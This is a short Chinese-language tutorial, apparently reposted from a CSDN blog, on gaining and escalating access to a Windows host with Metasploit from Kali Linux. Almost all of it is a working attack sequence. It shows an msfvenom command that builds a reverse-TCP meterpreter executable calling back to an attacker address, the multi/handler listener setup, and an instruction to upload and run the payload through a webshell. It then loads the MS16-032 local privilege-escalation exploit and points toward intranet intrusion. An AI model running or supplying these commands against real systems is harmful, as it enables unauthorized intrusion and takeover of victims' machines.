kali下msf提权
生成木马 Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.132 lport=4444 -f exe -o /root/Desktop/1.exe 配置监听程序 Msfconsole 打开Metaploit msf > use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.184.132 Exploit 现在将1.exe 通过菜刀或者webshell 上次到可写目录,并且执行 这样就监听成功了 获得一个session (会话) Getuid 查看主机名 shell 进入命令行模式 当然这里也可以加载exp Exit 返回到meterpeter模式 Background 返回 multi/handler use exploit/windows/local/ms16_032_secondary_logon_handle_privesc 加载exp Session 1 返回之前的会话 Exploit 进行提权 这说明exp执行成功,可以进一步提权,内网渗透了 来源: CSDN 作者: 沧海NO1 链接: https://blog.csdn.net/u010025272/article